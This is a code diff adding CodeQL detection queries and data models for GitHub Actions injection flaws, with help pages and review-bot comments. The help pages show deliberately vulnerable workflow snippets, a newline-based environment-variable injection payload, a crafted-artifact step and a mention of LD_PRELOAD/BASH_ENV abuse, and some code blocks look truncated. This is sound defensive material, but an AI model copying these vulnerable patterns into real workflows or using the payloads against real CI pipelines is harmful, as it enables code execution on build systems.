+++ b/actions/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection", "manual"] + - ["zaproxy/action-full-scan", "*", "input.target", "command-injection", "manual"] + - ["zaproxy/action-full-scan", "*", "input.rules_file_name", "command-injection", "manual"] + - ["zaproxy/action-full-scan", "*", "input.cmd_options", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml b/actions/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml new file mode 100644 index 000000000000..0cce7cc0cff7 --- /dev/null +++ b/actions/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["zentered/issue-forms-body-parser", "*", "input.body", "output.data", "taint", "manual"] diff --git a/actions/ql/lib/ide-contextual-queries/printAst.ql b/actions/ql/lib/ide-contextual-queries/printAst.ql new file mode 100644 index 000000000000..450f4446e361 --- /dev/null +++ b/actions/ql/lib/ide-contextual-queries/printAst.ql 
@@ -0,0 +1,28 @@ +/** + * @name Print AST + * @description Produces a representation of a file's Abstract Syntax Tree. + * This query is used by the VS Code extension. + * @id actions/print-ast + * @kind graph + * @tags ide-contextual-queries/print-ast + */ + +private import codeql.actions.ideContextual.IDEContextual +import codeql.actions.ideContextual.printAst +private import codeql.actions.Ast + +/** + * The source file to generate an AST from. + */ +external string selectedSourceFile(); + +/** + * A configuration that only prints nodes in the selected source file. + */ +class Cfg extends PrintAstConfiguration { + override predicate shouldPrintNode(PrintAstNode n) { + super.shouldPrintNode(n) and + n instanceof PrintRegularAstNode and + n.getLocation().getFile() = getFileBySourceArchiveName(selectedSourceFile()) + } +} diff --git a/actions/ql/lib/qlpack.yml b/actions/ql/lib/qlpack.yml index 4f674220c885..83cdaabc80dd 100644 --- a/actions/ql/lib/qlpack.yml +++ b/actions/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/actions-all -version: 0.0.1-dev +version: 0.4.0-dev library: true warnOnImplicitThis: true dependencies: @@ -10,3 +10,7 @@ dependencies: codeql/javascript-all: ${workspace} extractor: actions groups: actions +dataExtensions: + - ext/manual/*.model.yml + - ext/generated/**/*.model.yml + - ext/config/*.yml diff --git a/actions/ql/src/Debug/SyntaxError.ql b/actions/ql/src/Debug/SyntaxError.ql new file mode 100644 index 000000000000..9a638ad7fbe2 --- /dev/null +++ b/actions/ql/src/Debug/SyntaxError.ql @@ -0,0 +1,17 @@ +/** + * @name Syntax error + * @description A piece of code could not be parsed due to syntax errors. + * @kind problem + * @problem.severity recommendation + * @id actions/syntax-error + * @tags reliability + * correctness + * language-features + * debug + * @precision very-high + */ + +private import codeql.actions.ast.internal.Yaml + +from YamlParseError pe +select pe, pe.getMessage() 
diff --git a/actions/ql/src/Debug/partial.ql b/actions/ql/src/Debug/partial.ql new file mode 100644 index 000000000000..cb8ba7873d8c --- /dev/null +++ b/actions/ql/src/Debug/partial.ql @@ -0,0 +1,36 @@ +/** + * @name Forward Partial Dataflow + * @description Forward Partial Dataflow + * @kind path-problem + * @precision low + * @problem.severity error + * @id actions/test-dataflow + * @tags actions + * debug + */ + +import actions +import codeql.actions.DataFlow +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import PartialFlow::PartialPathGraph + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource and + source.getLocation().getFile().getBaseName() = "non-existant-test.yml" + } + + predicate isSink(DataFlow::Node sink) { none() } +} + +private module MyFlow = TaintTracking::Global; // or DataFlow::Global<..> + +int explorationLimit() { result = 10 } + +private module PartialFlow = MyFlow::FlowExplorationFwd; + +from PartialFlow::PartialPathNode source, PartialFlow::PartialPathNode sink +where PartialFlow::partialFlow(source, sink, _) +select sink.getNode(), source, sink, "This node receives taint from $@.", source.getNode(), + "this source" diff --git a/actions/ql/src/Models/CompositeActionsSinks.ql b/actions/ql/src/Models/CompositeActionsSinks.ql new file mode 100644 index 000000000000..b5ce78fe062a --- /dev/null +++ b/actions/ql/src/Models/CompositeActionsSinks.ql 
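Review bot: The source filter in `isSource` pins the query to a file literally named `non-existant-test.yml`, so as committed it returns nothing until someone edits that literal, and nothing in the header says so. Add a comment above the predicate such as `// Replace "non-existant-test.yml" with the base name of the workflow under investigation before running.` The `@precision low` marker is presumably what keeps this Debug query out of the default suites; if the suite definitions do not guarantee that, the `@problem.severity error` tag would make a partial-flow exploration show up as a real alert.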
@@ -0,0 +1,37 @@ +/** + * @name Composite Action Sinks + * @description Actions passing input variables to expression injection sinks. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/composite-action-sinks + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.security.CodeInjectionQuery +import codeql.actions.TaintTracking +import codeql.actions.dataflow.ExternalFlow + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + exists(CompositeAction c | c.getAnInput() = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { + sink instanceof CodeInjectionSink and not madSink(sink, "code-injection") + } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Sink" diff --git a/actions/ql/src/Models/CompositeActionsSources.ql b/actions/ql/src/Models/CompositeActionsSources.ql new file mode 100644 index 000000000000..8e4275f27c7d --- /dev/null +++ b/actions/ql/src/Models/CompositeActionsSources.ql 
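Review bot: The alert message is the bare string `"Sink"` and the header carries `@security-severity 9.3` with `@precision high`, which is the profile of a shipping security query rather than of the `model-generator` helper the tags describe; if this query ever lands in a suite it will surface as a critical alert with a one-word message. Either drop the `@security-severity` line or make the message self-explanatory, e.g. `"Composite action input $@ reaches a code-injection sink.", source.getNode(), source.getNode().toString()`. The same pattern applies to the sibling model-generator queries in this change.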
@@ -0,0 +1,47 @@ +/** + * @name Composite Action Sources + * @description Actions that pass user-controlled data to their output variables. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/composite-action-sources + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.DataFlow +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource and + not source instanceof DataFlow::ParameterNode and + exists(CompositeAction c | c.getAChildNode*() = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { + exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr()) + } + + predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { + allowImplicitRead(node, set) + or + isSink(node) and + set instanceof DataFlow::FieldContent + } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Source" diff --git a/actions/ql/src/Models/CompositeActionsSummaries.ql b/actions/ql/src/Models/CompositeActionsSummaries.ql new file mode 100644 index 000000000000..8b8b5af3c459 --- /dev/null +++ b/actions/ql/src/Models/CompositeActionsSummaries.ql 
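Review bot: In `allowImplicitRead`, the first disjunct `allowImplicitRead(node, set)` resolves to the predicate being defined (the module's own declaration shadows anything an import could provide), so it is a self-recursive call that contributes no tuples to the least fixpoint and only misleads the reader into thinking a default is being extended. Reduce the body to the second disjunct, `isSink(node) and set instanceof DataFlow::FieldContent`, and document why field reads are allowed at the sink: `// outputs are often whole objects; allow reading any field at the output expression`. `ReusableWorkflowsSources.ql` in this change has the same construct.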
@@ -0,0 +1,38 @@ +/** + * @name Composite Action Summaries + * @description Actions that pass user-controlled data to their output variables. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/composite-action-summaries + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.DataFlow +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + exists(CompositeAction c | c.getAnInput() = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { + exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr()) + } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Summary" diff --git a/actions/ql/src/Models/ReusableWorkflowsSinks.ql b/actions/ql/src/Models/ReusableWorkflowsSinks.ql new file mode 100644 index 000000000000..6da9acda9060 --- /dev/null +++ b/actions/ql/src/Models/ReusableWorkflowsSinks.ql 
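Review bot: The `@description` is copied from the Sources query ("Actions that pass user-controlled data to their output variables"), but this query's source is `c.getAnInput()`, not `RemoteFlowSource`, so it actually finds actions that propagate their own inputs to their outputs — which is what a summary model records. Suggest `@description Composite actions whose inputs flow to their output variables.` The bare `"Summary"` alert message could likewise name the input and output so the generated model can be checked by eye.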
@@ -0,0 +1,37 @@ +/** + * @name Reusable Workflow Sinks + * @description Reusable Workflows passing parameters to an expression injection sink. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/reusable-wokflow-sinks + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.security.CodeInjectionQuery +import codeql.actions.TaintTracking +import codeql.actions.dataflow.ExternalFlow + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + exists(ReusableWorkflow w | w.getAnInput() = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { + sink instanceof CodeInjectionSink and not madSink(sink, "code-injection") + } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Sink" diff --git a/actions/ql/src/Models/ReusableWorkflowsSources.ql b/actions/ql/src/Models/ReusableWorkflowsSources.ql new file mode 100644 index 000000000000..e5612d063432 --- /dev/null +++ b/actions/ql/src/Models/ReusableWorkflowsSources.ql 
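Review bot: The query id `actions/reusable-wokflow-sinks` has a typo (`wokflow`), and ids are stable identifiers that suites and alert deduplication key on, so fixing it after release becomes a breaking change; correct it now to `@id actions/reusable-workflow-sinks` to match `actions/reusable-workflow-sources` and `actions/reusable-workflow-summaries` introduced in the same change. The one-word `"Sink"` message would also benefit from naming the input that reaches the sink.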
@@ -0,0 +1,47 @@ +/** + * @name Reusable Workflow Sources + * @description Reusable Workflow that pass user-controlled data to their output variables. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/reusable-workflow-sources + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.DataFlow +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource and + not source instanceof DataFlow::ParameterNode and + exists(ReusableWorkflow w | w.getAChildNode*() = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { + exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr()) + } + + predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { + allowImplicitRead(node, set) + or + isSink(node) and + set instanceof DataFlow::FieldContent + } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Source" diff --git a/actions/ql/src/Models/ReusableWorkflowsSummaries.ql b/actions/ql/src/Models/ReusableWorkflowsSummaries.ql new file mode 100644 index 000000000000..444ce028954e --- /dev/null +++ b/actions/ql/src/Models/ReusableWorkflowsSummaries.ql 
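Review bot: The first disjunct of `allowImplicitRead`, `allowImplicitRead(node, set)`, is a call to the predicate itself — the module-local declaration shadows any imported name — so it adds nothing to the least fixpoint and should be removed, leaving `isSink(node) and set instanceof DataFlow::FieldContent`. The `@description` also reads "Reusable Workflow that pass user-controlled data to their output variables"; suggest `@description Reusable workflows that pass user-controlled data to their output variables.`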
@@ -0,0 +1,38 @@ +/** + * @name Reusable Workflows Summaries + * @description Reusable workflow that pass user-controlled data to their output variables. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/reusable-workflow-summaries + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.DataFlow +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + exists(ReusableWorkflow w | w.getAnInput() = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { + exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr()) + } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Summary" diff --git a/actions/ql/src/Placeholder.ql b/actions/ql/src/Placeholder.ql deleted file mode 100644 index 63e32f04dfb3..000000000000 --- a/actions/ql/src/Placeholder.ql +++ /dev/null @@ -1,16 +0,0 @@ -/** - * @name Placeholder Query - * @description Placeholder - * @kind problem - * @problem.severity warning - * @security-severity 9.3 - * @precision high - * @id actions/placeholder - * @tags actions security - */ - -import actions -import javascript - -from File f -select f, "Analyzed a file." diff --git a/actions/ql/src/Security/CWE-074/OutputClobberingHigh.ql b/actions/ql/src/Security/CWE-074/OutputClobberingHigh.ql new file mode 100644 index 000000000000..9c9c2e4d139a --- /dev/null +++ b/actions/ql/src/Security/CWE-074/OutputClobberingHigh.ql 
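Review bot: The `@description` ("Reusable workflow that pass user-controlled data to their output variables") is copied from the Sources query, but here the source is `w.getAnInput()`, so the query reports workflows whose inputs flow to their outputs, not user-controlled data; suggest `@description Reusable workflows whose inputs flow to their output variables.` The `"Summary"` message could name the input and output so the generated summary row can be checked against the workflow.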
@@ -0,0 +1,44 @@ +/** + * @name Output Clobbering + * @description A Step output can be clobbered which may allow an attacker to manipulate the expected and trusted values of a variable. + * @kind path-problem + * @problem.severity error + * @security-severity 7.3 + * @precision high + * @id actions/output-clobbering/high + * @tags actions + * security + * experimental + * external/cwe/cwe-074 + */ + +import actions +import codeql.actions.security.OutputClobberingQuery +import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +import OutputClobberingFlow::PathGraph +import codeql.actions.security.ControlChecks + +from OutputClobberingFlow::PathNode source, OutputClobberingFlow::PathNode sink, Event event +where + OutputClobberingFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr(), event) and + // exclude paths to file read sinks from non-artifact sources + ( + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check.protects(sink.getNode().asExpr(), event, "code-injection") + ) + or + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check.protects(sink.getNode().asExpr(), event, ["untrusted-checkout", "artifact-poisoning"]) + ) and + ( + sink.getNode() instanceof OutputClobberingFromFileReadSink or + sink.getNode() instanceof WorkflowCommandClobberingFromFileReadSink or + madSink(sink.getNode(), "output-clobbering") + ) + ) +select sink.getNode(), source, sink, "Potential clobbering of a step output in $@.", sink, + sink.getNode().toString() diff --git a/actions/ql/src/Security/CWE-077/EnvPathInjectionCritical.md b/actions/ql/src/Security/CWE-077/EnvPathInjectionCritical.md new file mode 100644 index 000000000000..36622d127d80 --- /dev/null +++ b/actions/ql/src/Security/CWE-077/EnvPathInjectionCritical.md 
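Review bot: The comment `// exclude paths to file read sinks from non-artifact sources` does not describe the disjunction below it: the non-artifact branch admits every sink, file-read sinks included, while it is the artifact branch that is narrowed to `OutputClobberingFromFileReadSink`, `WorkflowCommandClobberingFromFileReadSink` or a MaD `output-clobbering` sink. If that asymmetry is intended, reword to `// artifact-sourced flows only count when they reach a file-read or MaD sink; text sources count at any sink`; if the comment is right and the code is wrong, the first branch needs a conjunct excluding the file-read sink classes. The non-artifact branch also consults only `code-injection` control checks, whereas the EnvVar sibling additionally consults its own category — confirm there is no output-clobbering-specific check category to honour here.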
@@ -0,0 +1,39 @@ +# Environment Path Injection + +## Description + +GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. + +E.g.: + +```bash +echo "$HOME/.local/bin" >> $GITHUB_PATH +``` + +If an attacker can control the contents of the system PATH, they are able to influence what commands are run in subsequent steps of the same job. + +## Recommendations + +Do not allow untrusted data to influence the system PATH: Avoid using untrusted data sources (e.g., artifact content) to define the system PATH. + +## Examples + +### Incorrect Usage + +Consider the following basic setup where an environment variable `PATH` is set: + +```yaml +steps: + - name: Set the path + env: + BODY: ${{ github.event.comment.body }} + run: | + PATH=$(echo "$BODY" | grep -oP 'system path: \K\S+') + echo "$PATH" >> "$GITHUB_PATH" +``` + +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially change the system PATH and get arbitrary command execution in subsequent steps. + +## References + +- [Workflow commands for GitHub Actions](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions) diff --git a/actions/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql b/actions/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql new file mode 100644 index 000000000000..3bb1558788a6 --- /dev/null +++ b/actions/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql 
@@ -0,0 +1,39 @@ +/** + * @name PATH Enviroment Variable built from user-controlled sources + * @description Building the PATH environment variable from user-controlled sources may alter the execution of following system commands + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision very-high + * @id actions/envpath-injection/critical + * @tags actions + * security + * external/cwe/cwe-077 + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.security.EnvPathInjectionQuery +import EnvPathInjectionFlow::PathGraph +import codeql.actions.dataflow.FlowSources +import codeql.actions.security.ControlChecks + +from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink, Event event +where + EnvPathInjectionFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr(), event) and + ( + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check.protects(sink.getNode().asExpr(), event, "code-injection") + ) + or + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check.protects(sink.getNode().asExpr(), event, ["untrusted-checkout", "artifact-poisoning"]) + ) and + sink.getNode() instanceof EnvPathInjectionFromFileReadSink + ) +select sink.getNode(), source, sink, + "Potential PATH environment variable injection in $@, which may be controlled by an external user ($@).", + sink, sink.getNode().toString(), event, event.getName() diff --git a/actions/ql/src/Security/CWE-077/EnvPathInjectionMedium.md b/actions/ql/src/Security/CWE-077/EnvPathInjectionMedium.md new file mode 100644 index 000000000000..36622d127d80 --- /dev/null +++ b/actions/ql/src/Security/CWE-077/EnvPathInjectionMedium.md 
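Review bot: The user-facing `@name` misspells Environment (`PATH Enviroment Variable built from user-controlled sources`); fix to `@name PATH Environment Variable built from user-controlled sources` (the Medium and EnvVar siblings in this change carry the same typo). Separately, the artifact branch accepts only `EnvPathInjectionFromFileReadSink`, with no `madSink(..., "envpath-injection")` alternative like the EnvVar query has; if manual models can declare PATH-writing action inputs, artifact flows into them are dropped here — confirm whether such a MaD kind exists, and if not, a comment saying so would pre-empt the question.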
@@ -0,0 +1,39 @@ +# Environment Path Injection + +## Description + +GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. + +E.g.: + +```bash +echo "$HOME/.local/bin" >> $GITHUB_PATH +``` + +If an attacker can control the contents of the system PATH, they are able to influence what commands are run in subsequent steps of the same job. + +## Recommendations + +Do not allow untrusted data to influence the system PATH: Avoid using untrusted data sources (e.g., artifact content) to define the system PATH. + +## Examples + +### Incorrect Usage + +Consider the following basic setup where an environment variable `PATH` is set: + +```yaml +steps: + - name: Set the path + env: + BODY: ${{ github.event.comment.body }} + run: | + PATH=$(echo "$BODY" | grep -oP 'system path: \K\S+') + echo "$PATH" >> "$GITHUB_PATH" +``` + +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially change the system PATH and get arbitrary command execution in subsequent steps. + +## References + +- [Workflow commands for GitHub Actions](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions) diff --git a/actions/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql b/actions/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql new file mode 100644 index 000000000000..a1499764ef36 --- /dev/null +++ b/actions/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql 
@@ -0,0 +1,32 @@ +/** + * @name PATH Enviroment Variable built from user-controlled sources + * @description Building the PATH environment variable from user-controlled sources may alter the execution of following system commands + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision high + * @id actions/envpath-injection/medium + * @tags actions + * security + * external/cwe/cwe-077 + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.security.EnvPathInjectionQuery +import codeql.actions.dataflow.FlowSources +import EnvPathInjectionFlow::PathGraph + +from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink +where + EnvPathInjectionFlow::flowPath(source, sink) and + inNonPrivilegedContext(sink.getNode().asExpr()) and + ( + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + or + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + sink.getNode() instanceof EnvPathInjectionFromFileReadSink + ) +select sink.getNode(), source, sink, + "Potential PATH environment variable injection in $@, which may be controlled by an external user.", + sink, sink.getNode().toString() diff --git a/actions/ql/src/Security/CWE-077/EnvVarInjectionCritical.md b/actions/ql/src/Security/CWE-077/EnvVarInjectionCritical.md new file mode 100644 index 000000000000..cc35402b804d --- /dev/null +++ b/actions/ql/src/Security/CWE-077/EnvVarInjectionCritical.md 
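Review bot: Same typo in the user-facing `@name` as the critical variant: `Enviroment` should read `@name PATH Environment Variable built from user-controlled sources`. Because the critical and medium queries share an identical `@name`, only the `@id` suffix distinguishes them in the UI, so the misspelling will be shown twice for every affected repository.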
@@ -0,0 +1,117 @@ +# Environment Variable Injection + +## Description + +GitHub Actions allow to define environment variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: + +This file contains lines in the `KEY=VALUE` format: + +```bash +steps: + - name: Set the value + id: step_one + run: | + echo "action_state=yellow" >> "$GITHUB_ENV" +``` + +It is also possible to define multiline variables by using the [following construct](https://en.wikipedia.org/wiki/Here_document): + +``` +KEY<<{delimiter} +VALUE +VALUE +{delimiter} +``` + +```bash +steps: + - name: Set the value in bash + id: step_one + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" +``` + +If an attacker can control the values assigned to environment variables and there is no sanitization in place, the attacker will be able to inject additional variables by injecting new lines or `{delimiters}`. + +## Recommendations + +1. **Do not allow untrusted data to influence environment variables**: + + - Avoid using untrusted data sources (e.g., artifact content) to define environment variables. + - Validate and sanitize all inputs before using them in environment settings. + +2. **Do not allow new lines when defining single line environment variables**: + + - `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` + +3. 
**Use unique identifiers when defining multi line environment variables**: + + ```bash + steps: + - name: Set the value in bash + id: step_one + run: | + # Generate a UUID + UUID=$(uuidgen) + { + echo "JSON_RESPONSE<> "$GITHUB_ENV" + ``` + +## Examples + +### Example of Vulnerability + +Consider the following basic setup where an environment variable `MYVAR` is set and used in subsequent steps: + +```yaml +steps: + - name: Set the value + id: step_one + env: + BODY: ${{ github.event.comment.body }} + run: | + REPLACED=$(echo "$BODY" | sed 's/FOO/BAR/g') + echo "MYVAR=$REPLACED" >> "$GITHUB_ENV" +``` + +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, the attacker can potentially inject new environment variables. For example, they could write an issue comment like: + +```text +FOO +NEW_ENV_VAR=MALICIOUS_VALUE +``` + +Likewise, if the attacker controls a file in the GitHub Actions Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact) and the contents of that file are assigned to an environment variable such as: + +```bash +- run: | + PR_NUMBER=$(cat pr-number.txt) + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_ENV +``` + +An attacker could craft a malicious artifact that writes dangerous environment variables: + +```bash + - run: | + echo -e "666\nNEW_ENV_VAR=MALICIOUS_VALUE" > pr-number.txt + - uses: actions/upload-artifact@v4 + with: + name: pr-number + path: ./pr-number.txt +``` + +### Exploitation + +An attacker is be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. 
+ +## References + +- [Workflow commands for GitHub Actions](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions) +- [GitHub Actions Exploitation: Repo Jacking and Environment Manipulation](https://www.synacktiv.com/publications/github-actions-exploitation-repo-jacking-and-environment-manipulation) diff --git a/actions/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/actions/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql new file mode 100644 index 000000000000..13086c630808 --- /dev/null +++ b/actions/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql 
@@ -0,0 +1,48 @@ +/** + * @name Enviroment Variable built from user-controlled sources + * @description Building an environment variable from user-controlled sources may alter the execution of following system commands + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision very-high + * @id actions/envvar-injection/critical + * @tags actions + * security + * external/cwe/cwe-077 + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.security.EnvVarInjectionQuery +import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +import EnvVarInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks + +from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink, Event event +where + EnvVarInjectionFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr(), event) and + // exclude paths to file read sinks from non-artifact sources + ( + // source is text + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check.protects(sink.getNode().asExpr(), event, ["envvar-injection", "code-injection"]) + ) + or + // source is an artifact or a file from an untrusted checkout + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), event, + ["envvar-injection", "untrusted-checkout", "artifact-poisoning"]) + ) and + ( + sink.getNode() instanceof EnvVarInjectionFromFileReadSink or + madSink(sink.getNode(), "envvar-injection") + ) + ) +select sink.getNode(), source, sink, + "Potential environment variable injection in $@, which may be controlled by an external user ($@).", + sink, sink.getNode().toString(), event, event.getName() diff --git a/actions/ql/src/Security/CWE-077/EnvVarInjectionMedium.md b/actions/ql/src/Security/CWE-077/EnvVarInjectionMedium.md new file mode 100644 index 000000000000..cc35402b804d 
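Review bot: The `@name` misspells Environment (`Enviroment Variable built from user-controlled sources`); fix to `@name Environment Variable built from user-controlled sources`. The comment `// exclude paths to file read sinks from non-artifact sources` is also inaccurate for the disjunction beneath it — the non-artifact branch accepts any sink and it is the artifact branch that is restricted to `EnvVarInjectionFromFileReadSink` or a MaD `envvar-injection` sink — so either reword it to `// artifact-sourced flows only count at file-read or MaD sinks; text sources count at any sink` or add the exclusion the comment promises. The inline `// source is text` / `// source is an artifact or a file from an untrusted checkout` comments are good and make the misleading header comment redundant.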
--- /dev/null +++ b/actions/ql/src/Security/CWE-077/EnvVarInjectionMedium.md 
@@ -0,0 +1,117 @@ +# Environment Variable Injection + +## Description + +GitHub Actions allow to define environment variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: + +This file contains lines in the `KEY=VALUE` format: + +```bash +steps: + - name: Set the value + id: step_one + run: | + echo "action_state=yellow" >> "$GITHUB_ENV" +``` + +It is also possible to define multiline variables by using the [following construct](https://en.wikipedia.org/wiki/Here_document): + +``` +KEY<<{delimiter} +VALUE +VALUE +{delimiter} +``` + +```bash +steps: + - name: Set the value in bash + id: step_one + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" +``` + +If an attacker can control the values assigned to environment variables and there is no sanitization in place, the attacker will be able to inject additional variables by injecting new lines or `{delimiters}`. + +## Recommendations + +1. **Do not allow untrusted data to influence environment variables**: + + - Avoid using untrusted data sources (e.g., artifact content) to define environment variables. + - Validate and sanitize all inputs before using them in environment settings. + +2. **Do not allow new lines when defining single line environment variables**: + + - `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` + +3. 
